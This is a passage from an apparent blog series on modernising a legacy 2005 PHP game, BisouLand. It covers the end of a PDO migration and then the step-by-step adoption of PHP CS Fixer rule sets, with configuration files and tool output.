'pseudo' => $pseudo,
'mdp' => $hmdp,
'confirmation' => 1,
'timestamp' => time(),
'lastconnect' => time(),
'amour' => 300,
]);
$id = $pdo->lastInsertId();
There were 25 PHP files with roughly 250 such calls, by the way.
And before we forget:
with prepared statements we no longer need the calls to addslashes(),
so we can also remove them.
We shouldn't stop there. There's an issue we've encountered in a previous article,
where the code was using '' for the id column in INSERT statements.
This was relying on string to integer conversion, which MySQL supported until version 5.7.
After a quick look, I've found 5 more instances of these, which I've now fixed.
And last but not least, still on the topic of string to integer conversion, there are other integer fields that are receiving strings:
web/phpincludes/inscription.php:
- '1' is used for the confirmation field, should be 1 (TINYINT field)
- '300' is used for the amour field, should be 300 (INT field)

web/phpincludes/lire.php: '1' is used for status (INT field)
web/phpincludes/attaque.php: '0' is used for finaller (INT field)
web/news/liste_news.php: '0' is used for timestamp_modification (INT field)
web/phpincludes/cerveau.php: '1' is used for confirmation (TINYINT field)
web/phpincludes/membres.php: '1' is used for confirmation (TINYINT field)

This has been a lot of effort, and there's seemingly not a lot to show for it.
But by switching from the MySQL extension to PDO, we've unlocked something amazing: we will be able to upgrade to the latest version of PHP, which will provide a big performance boost as well as many security patches.
And we will be able to switch to PostgreSQL!
⁉️ What do you mean, "PHP is slow and we should use go / rust"?
🤘 The Coding Standards Inquisitor rises from the sulphurous pits of Legacy Chaos, brandishing the iron scriptures of Style Guides, purging the realm of inconsistent formatting with flames of automated linting! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But the code is ugly!
So we're going to establish beautiful Coding Standards, the focus of this fourth article, and enforce them automatically using PHP CS Fixer.
We will not start with the highest quality standard, as this would make it too difficult to track the changes.
Instead we'll:
Ideally, teams should discuss and agree on a select list of rules to follow, but the list of possible rules is too overwhelming.
So instead of picking rules one by one, we can rely on rule sets.
My humble opinion is that the Symfony CS are the best, but that'd be too many rules to add in one go.
If we check the Symfony rule set doc, at the top we can see @PER-CS3x0.
Rules that start with @ are actually rulesets,
so Symfony depends on other smaller rulesets,
and those smaller rulesets also depend on other smaller rulesets.
It's a tedious task, but we can navigate the documentation website, construct the tree of rule sets used, and then start with the smaller one:
For each rule set, we then check if anything is breaking, and if so we exclude the specific rule.
Let's start with an empty configuration in apps/qa/.php-cs-fixer.dist.php:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Running it will not report any problems:
> make cs-check # equivalent to: ./vendor/bin/php-cs-fixer check --verbose
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
Found 0 of 43 files that can be fixed in 0.105 seconds, 18.00 MB memory used
Let's add the PSR-1 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
'@PSR1' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
This will make sure we use, among other things, full opening tags (not <? but <?php).
Let's run the checks:
> make cs-check
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/news/chemin.php (full_opening_tag)
Found 1 of 43 files that can be fixed in 0.103 seconds, 18.00 MB memory used
There's one file that uses <?, to automatically fix it we run:
> make cs-fix # equivalent to: ./vendor/bin/php-cs-fixer fix --verbose
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/news/chemin.php (full_opening_tag)
Fixed 1 of 43 files in 0.107 seconds, 18.00 MB memory used
And that's PSR-1 done and dusted.
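To make the fix concrete, here's the kind of change full_opening_tag makes (a hypothetical one-liner, not the actual contents of chemin.php):

```diff
-<? echo $chemin; ?>
+<?php echo $chemin; ?>
```

Short open tags only work when short_open_tag is enabled in php.ini, so normalising them makes the code portable.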
Time for the PSR-2 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
'@PSR2' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
It adds about 30 new rules, mainly regarding brace placement and indentation formatting.
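Here's roughly what those rules change, on a made-up snippet (afficherMenu() is hypothetical):

```diff
-if ($connected)
-  {
-  afficherMenu();
-  }
+if ($connected) {
+    afficherMenu();
+}
```

PSR-2 wants the opening brace of control structures on the same line, with four-space indentation.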
Let's run a check:
> make cs-check
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (no_closing_tag, no_trailing_whitespace, single_blank_line_at_eof)
2) ../monolith/web/redirect.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, braces_position, statement_indentation, single_blank_line_at_eof)
3) ../monolith/web/checkConnect.php (indentation_type, elseif, single_space_around_construct, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation,single_blank_line_at_eof)
4) ../monolith/web/phpincludes/fctIndex.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, control_structure_braces, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
5) ../monolith/web/phpincludes/topten.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
6) ../monolith/web/phpincludes/pages.php (indentation_type, no_closing_tag, statement_indentation, single_blank_line_at_eof)
7) ../monolith/web/config/parameters.php (single_blank_line_at_eof)
8) ../monolith/web/deconnexion.php (indentation_type, single_space_around_construct, no_closing_tag, braces_position, single_blank_line_at_eof)
9) ../monolith/web/news/rediger_news.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
10) ../monolith/web/news/chemin.php (no_closing_tag, single_blank_line_at_eof)
11) ../monolith/web/news/liste_news.php (indentation_type, single_space_around_construct, lowercase_keywords, braces_position, statement_indentation)
12) ../monolith/web/phpincludes/evo.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
13) ../monolith/web/phpincludes/stats.php (indentation_type, method_argument_space, statement_indentation)
14) ../monolith/web/phpincludes/infos.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
15) ../monolith/web/phpincludes/yeux.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
16) ../monolith/web/phpincludes/inscription.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, braces_position, statement_indentation)
17) ../monolith/web/phpincludes/faq.php (indentation_type, braces_position, statement_indentation)
18) ../monolith/web/phpincludes/construction.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, braces_position, statement_indentation)
19) ../monolith/web/phpincludes/recherche.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position)
20) ../monolith/web/phpincludes/bd.php (braces_position, statement_indentation)
21) ../monolith/web/phpincludes/accueil.php (indentation_type, no_trailing_whitespace, braces_position, statement_indentation)
22) ../monolith/web/phpincludes/lire.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
23) ../monolith/web/phpincludes/membres.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
24) ../monolith/web/phpincludes/nuage.php (indentation_type, single_space_around_construct, method_argument_space, no_trailing_whitespace, braces_position, statement_indentation)
25) ../monolith/web/phpincludes/attaque.php (indentation_type, single_space_around_construct, method_argument_space, no_closing_tag, no_trailing_whitespace, no_trailing_whitespace_in_comment, no_multiple_statements_per_line, braces_position, statement_indentation, single_blank_line_at_eof)
26) ../monolith/web/phpincludes/confirmation.php (indentation_type, single_space_around_construct, method_argument_space, spaces_inside_parentheses, no_closing_tag, no_trailing_whitespace, braces_position, statement_indentation, single_blank_line_at_eof)
27) ../monolith/web/phpincludes/changepass.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parenthes, no_trailing_whitespace, braces_position, statement_indentation)
28) ../monolith/web/phpincludes/techno.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, braces_position, statement_indentation)
29) ../monolith/web/phpincludes/newpass.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parentheses,no_trailing_whitespace, braces_position, statement_indentation)
30) ../monolith/web/makeBan.php (indentation_type, single_space_around_construct, method_argument_space, no_spaces_after_function_name, spaces_inside_parentheses, no_closing_tag, braces_position, statement_indentation, single_blank_line_at_eof)
31) ../monolith/web/index.php (indentation_type, single_space_around_construct, method_argument_space, control_structure_braces, no_trailing_whitespace, no_trailing_whitespace_in_comment, braces_position, statement_indentation)
32) ../monolith/web/phpincludes/livreor.php (indentation_type, single_space_around_construct, no_trailing_whitespace, braces_position, statement_indentation)
33) ../monolith/web/phpincludes/connexion.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
34) ../monolith/web/phpincludes/boite.php (indentation_type, single_space_around_construct, method_argument_space, control_structure_braces, lowercase_keywords, no_trailing_whitespace, braces_position, statement_indentation)
35) ../monolith/web/phpincludes/connected.php (indentation_type, single_space_around_construct, braces_position, statement_indentation)
36) ../monolith/web/phpincludes/envoi.php (indentation_type, single_space_around_construct, method_argument_space, braces_position, statement_indentation)
37) ../monolith/web/phpincludes/action.php (indentation_type, single_space_around_construct, method_argument_space, braces_position, statement_indentation)
Found 37 of 43 files that can be fixed in 0.207 seconds, 18.00 MB memory used
Files that were not fixed due to errors reported during linting after fixing:
1) /apps/qa/../monolith/web/phpincludes/cerveau.php
2) /apps/qa/../monolith/web/phpincludes/bisous.php
We have lots of changes, but what I'd like to focus on are the two errors at the end.
To find out which specific rules are the culprits,
we can replace @PSR2 with all the individual rules it includes:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// '@PSR2' => true,
'@PSR1' => true,
'blank_line_after_namespace' => true,
'braces_position' => true,
'class_definition' => true,
'constant_case' => true,
'control_structure_braces' => true,
'control_structure_continuation_position' => true,
'elseif' => true,
'function_declaration' => ['closure_fn_spacing' => 'one'],
'indentation_type' => true,
'line_ending' => true,
'lowercase_keywords' => true,
'method_argument_space' => ['after_heredoc' => false, 'attribute_placement' => 'ignore', 'on_multiline' => 'ensure_fully_multiline'],
'modifier_keywords' => ['elements' => ['method', 'property']],
'no_break_comment' => true,
'no_closing_tag' => true,
'no_multiple_statements_per_line' => true,
'no_space_around_double_colon' => true,
'no_spaces_after_function_name' => true,
'no_trailing_whitespace' => true,
'no_trailing_whitespace_in_comment' => true,
'single_blank_line_at_eof' => true,
'single_class_element_per_statement' => ['elements' => ['property']],
'single_import_per_statement' => true,
'single_line_after_imports' => true,
'single_space_around_construct' => ['constructs_followed_by_a_single_space' => ['abstract', 'as', 'case', 'catch', 'class', 'do', 'else', 'elseif', 'final', 'for', 'foreach', 'function', 'if', 'interface', 'namespace', 'private', 'protected', 'public', 'static', 'switch', 'trait', 'try', 'use_lambda', 'while'], 'constructs_preceded_by_a_single_space' => ['as', 'else', 'elseif', 'use_lambda']],
'spaces_inside_parentheses' => true,
'statement_indentation' => true,
'switch_case_semicolon_to_colon' => true,
'switch_case_space' => true,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Then we eliminate one rule, run the check, and see if the error is still there, then eliminate the next rule, etc.
Doing so, I've identified statement_indentation as the offender.
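An alternative to editing the config each time: PHP CS Fixer's --rules option lets you dry-run a single rule against a single file, which makes the bisection much faster (a sketch using this project's paths):

```shell
# Dry-run a single rule against one of the failing files; --diff shows
# what would change without modifying anything.
./vendor/bin/php-cs-fixer fix --dry-run --diff \
    --rules=statement_indentation \
    ../monolith/web/phpincludes/cerveau.php
```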
Looking at apps/monolith/web/phpincludes/cerveau.php,
we can see a mix of HTML and PHP (the following is a condensed example):
<h1>Cerveau</h1>
<?php
if ($_SESSION['logged'] == true)
{
$production = calculerGenAmour(0,3600,$nbE[0][0],$nbE[1][0],$nbE[1][1],$nbE[1][2]);
?>
Score : <strong><?php echo formaterNombre($score); ?></strong> Point<?php echo pluriel($score);?><br />
<?php
if ($donnees_info = mysql_fetch_assoc($sql_info))
{
$pseudoCible = $donnees_info['pseudo'];
?>
Tu vas tenter d'embrasser <strong><?php echo $pseudoCible; ?></strong>
<?php
}
}
?>
This is a known issue,
and currently PHP CS Fixer doesn't support this kind of file,
so all we can do is restore @PSR2 and then disable that one specific rule:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR2' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Now we can fix the files by running make cs-fix.
Let's now upgrade to the PSR-12 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR12' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
PSR-12 extends PSR-2 with rules for modern PHP syntax: return type declarations, nullable types, and other PHP 7+ constructs that didn't exist when PSR-2 was written (back in 2012, when PHP 5.4 was released).
Let's run the checks:
> make cs-check
PHP CS Fixer 3.85.1 Alexander by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (binary_operator_spaces)
2) ../monolith/web/redirect.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
3) ../monolith/web/checkConnect.php (binary_operator_spaces, no_whitespace_in_blank_line)
4) ../monolith/web/phpincludes/fctIndex.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
5) ../monolith/web/phpincludes/topten.php (binary_operator_spaces, no_whitespace_in_blank_line)
6) ../monolith/web/phpincludes/pages.php (blank_line_after_opening_tag)
7) ../monolith/web/deconnexion.php (blank_line_after_opening_tag, binary_operator_spaces)
8) ../monolith/web/news/rediger_news.php (no_whitespace_in_blank_line)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/phpincludes/evo.php (binary_operator_spaces, no_whitespace_in_blank_line)
11) ../monolith/web/phpincludes/stats.php (binary_operator_spaces, no_whitespace_in_blank_line)
12) ../monolith/web/phpincludes/infos.php (binary_operator_spaces)
13) ../monolith/web/phpincludes/cerveau.php (binary_operator_spaces, no_whitespace_in_blank_line)
14) ../monolith/web/phpincludes/yeux.php (binary_operator_spaces, no_whitespace_in_blank_line)
15) ../monolith/web/phpincludes/inscription.php (binary_operator_spaces, no_whitespace_in_blank_line)
16) ../monolith/web/phpincludes/faq.php (binary_operator_spaces, no_whitespace_in_blank_line)
17) ../monolith/web/phpincludes/construction.php (binary_operator_spaces)
18) ../monolith/web/phpincludes/recherche.php (binary_operator_spaces)
19) ../monolith/web/makeBan.php (binary_operator_spaces, no_whitespace_in_blank_line)
20) ../monolith/web/index.php (binary_operator_spaces, no_whitespace_in_blank_line)
21) ../monolith/web/phpincludes/livreor.php (binary_operator_spaces, no_whitespace_in_blank_line)
22) ../monolith/web/phpincludes/bisous.php (binary_operator_spaces, no_whitespace_in_blank_line)
23) ../monolith/web/phpincludes/boite.php (indentation_type, binary_operator_spaces, no_whitespace_in_blank_line)
24) ../monolith/web/phpincludes/connected.php (indentation_type, binary_operator_spaces, no_whitespace_in_blank_line)
25) ../monolith/web/phpincludes/envoi.php (binary_operator_spaces, no_whitespace_in_blank_line)
26) ../monolith/web/phpincludes/action.php (binary_operator_spaces, no_whitespace_in_blank_line)
27) ../monolith/web/phpincludes/accueil.php (binary_operator_spaces, no_whitespace_in_blank_line)
28) ../monolith/web/phpincludes/lire.php (binary_operator_spaces, no_whitespace_in_blank_line)
29) ../monolith/web/phpincludes/membres.php (binary_operator_spaces)
30) ../monolith/web/phpincludes/nuage.php (binary_operator_spaces, no_whitespace_in_blank_line)
31) ../monolith/web/phpincludes/attaque.php (blank_line_after_opening_tag, binary_operator_spaces, no_whitespace_in_blank_line)
32) ../monolith/web/phpincludes/confirmation.php (binary_operator_spaces, no_whitespace_in_blank_line)
33) ../monolith/web/phpincludes/changepass.php (binary_operator_spaces, no_whitespace_in_blank_line)
34) ../monolith/web/phpincludes/techno.php (binary_operator_spaces)
35) ../monolith/web/phpincludes/newpass.php (binary_operator_spaces, no_whitespace_in_blank_line)
Found 35 of 43 files that can be fixed in 0.207 seconds, 18.00 MB memory used
So far so good, let's apply the changes: make cs-fix.
But we are not finished here: it's time to introduce risky rules. These are rules that, once applied, can potentially change the logic and behaviour of your code.
For example, the no_unreachable_default_argument_value rule removes default values from arguments that come before other arguments without default values.
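On a hypothetical signature (attaquer() is made up for illustration), the default on $cible is unreachable because $force, which follows it, has no default; the fixer therefore removes it:

```diff
-function attaquer($cible = 'personne', $force)
+function attaquer($cible, $force)
```

Callers must already be passing both arguments, so behaviour shouldn't change, but that's exactly the kind of assumption that makes the rule risky.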
Here's the new configuration:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PSR12' => true,
'@PSR12:risky' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Running make cs-check will show that all is fine,
so we apply the changes through make cs-fix,
then have a look at the diff,
and test around to make sure nothing is broken.
Next is the PER CS 2.0 ruleset:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PER-CS2.0' => true,
'@PER-CS2.0:risky' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
As the PHP language evolves it gains new features, which then require the coding-standards PSRs to be updated.
However, the PSR process was not suited to such updates, so the PER (PHP Evolving Recommendation) process was created.
PER CS 1.0, released in 2022, is intentionally strictly equivalent to PSR-12.
In 2023, PER CS 2.0 was released to cover new PHP 8 features, such as enums, match expressions, and trailing commas in parameter lists.
Because it targets recent PHP versions, some of its rules won't be compatible with our version of PHP (5.6).
In PHP 5.6, trailing commas are only supported in arrays, so we need to change our configuration slightly:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@PER-CS2.0' => true,
'@PER-CS2.0:risky' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
// [PER-CS2.0] Partially disabled due to PHP version constraints.
'trailing_comma_in_multiline' => [
'after_heredoc' => true,
'elements' => [
// 'arguments', For PHP 7.3+
// 'array_destructuring', For PHP 7.1+
'arrays',
// 'match', For PHP 8.0+
// 'parameters', For PHP 8.0+
],
],
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
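To see why the restriction is needed, here's a minimal sketch (the data is made up): a trailing comma after the last array element parses fine on PHP 5.6, while the same comma in a call's argument list is a parse error until PHP 7.3:

```php
<?php

// Fine on PHP 5.6: trailing comma after the last array element.
$scores = array(
    'bisous' => 12,
    'calins' => 7,
);

// Parse error before PHP 7.3, hence restricting the rule to 'arrays':
// formaterNombre(
//     $score,
// );

echo count($scores); // prints 2
```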
If we run the checks:
> make cs-check
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (concat_space, binary_operator_spaces)
2) ../monolith/web/redirect.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
3) ../monolith/web/checkConnect.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
4) ../monolith/web/phpincludes/fctIndex.php (array_syntax, array_indentation, blank_line_after_opening_tag, concat_space, trailing_comma_in_multiline, binary_operator_spaces,no_whitespace_in_blank_line)
5) ../monolith/web/phpincludes/topten.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
6) ../monolith/web/phpincludes/pages.php (array_syntax, blank_line_after_opening_tag, trailing_comma_in_multiline)
7) ../monolith/web/deconnexion.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces)
8) ../monolith/web/news/rediger_news.php (no_whitespace_in_blank_line)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/news/liste_news.php (concat_space)
11) ../monolith/web/phpincludes/evo.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
12) ../monolith/web/phpincludes/stats.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
13) ../monolith/web/phpincludes/infos.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces)
14) ../monolith/web/phpincludes/cerveau.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
15) ../monolith/web/phpincludes/yeux.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
16) ../monolith/web/phpincludes/inscription.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
17) ../monolith/web/phpincludes/faq.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
18) ../monolith/web/phpincludes/construction.php (concat_space, binary_operator_spaces)
19) ../monolith/web/phpincludes/recherche.php (concat_space, binary_operator_spaces)
20) ../monolith/web/phpincludes/bd.php (concat_space)
21) ../monolith/web/makeBan.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
22) ../monolith/web/index.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
23) ../monolith/web/phpincludes/livreor.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
24) ../monolith/web/phpincludes/bisous.php (array_syntax, concat_space, trailing_comma_in_multiline, binary_operator_spaces, no_whitespace_in_blank_line)
25) ../monolith/web/phpincludes/boite.php (indentation_type, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
26) ../monolith/web/phpincludes/connected.php (indentation_type, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
27) ../monolith/web/phpincludes/envoi.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
28) ../monolith/web/phpincludes/action.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
29) ../monolith/web/phpincludes/accueil.php (array_syntax, array_indentation, binary_operator_spaces, no_whitespace_in_blank_line)
30) ../monolith/web/phpincludes/lire.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
31) ../monolith/web/phpincludes/membres.php (concat_space, binary_operator_spaces)
32) ../monolith/web/phpincludes/nuage.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
33) ../monolith/web/phpincludes/attaque.php (blank_line_after_opening_tag, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
34) ../monolith/web/phpincludes/confirmation.php (array_syntax, concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
35) ../monolith/web/phpincludes/changepass.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
36) ../monolith/web/phpincludes/techno.php (concat_space, binary_operator_spaces)
37) ../monolith/web/phpincludes/newpass.php (concat_space, binary_operator_spaces, no_whitespace_in_blank_line)
Found 37 of 43 files that can be fixed in 0.210 seconds, 16.00 MB memory used
No errors this time either, so we can apply the fixes: make cs-fix.
Time for the final boss, the Coding Standards used in the Symfony project.
See Symfony ruleset here, and Symfony:risky ruleset there.
These rules are by no means required for Symfony projects (or any project); they're simply what the Symfony developers use internally to build the framework itself.
But these 41 rules provide, among other things, import (use statements) organisation and formatting.
The 34 risky rules also add performance optimisations (e.g. native function invocation with a leading backslash to bypass the autoload lookup).
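That native function invocation optimisation deserves a quick sketch (minimal example, not from the code base): inside a namespace, a bare count() forces the engine to look for a namespaced App\count() before falling back to the global function, while the backslash-prefixed call resolves directly and lets OPcache substitute its specialised opcode:

```php
<?php

namespace App;

// Unqualified: the engine checks for App\count() first.
$slow = count(array(1, 2, 3));

// Fully qualified: resolved directly to the native function,
// which is what the native_function_invocation fixer enforces.
$fast = \count(array(1, 2, 3));

echo $fast; // prints 3
```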
So let's adopt them here:
<?php
use PhpCsFixer\Runner\Parallel\ParallelConfigFactory;
$finder = (new PhpCsFixer\Finder())
->in(__DIR__.'/../monolith/web')
->exclude('ban')
->exclude('images')
->exclude('includes')
->exclude('polices')
->exclude('smileys')
;
return (new PhpCsFixer\Config())
->setRules([
// —— CS Rule Sets —————————————————————————————————————————————————————
'@Symfony' => true,
'@Symfony:risky' => true,
// —— Overridden rules —————————————————————————————————————————————————
// [PSR2] Disabled as the fixes break the following files:
// 1) ../monolith/web/phpincludes/bisous.php
// 2) ../monolith/web/phpincludes/cerveau.php
'statement_indentation' => false,
// [PER-CS2.0] Partially disabled due to PHP version constraints.
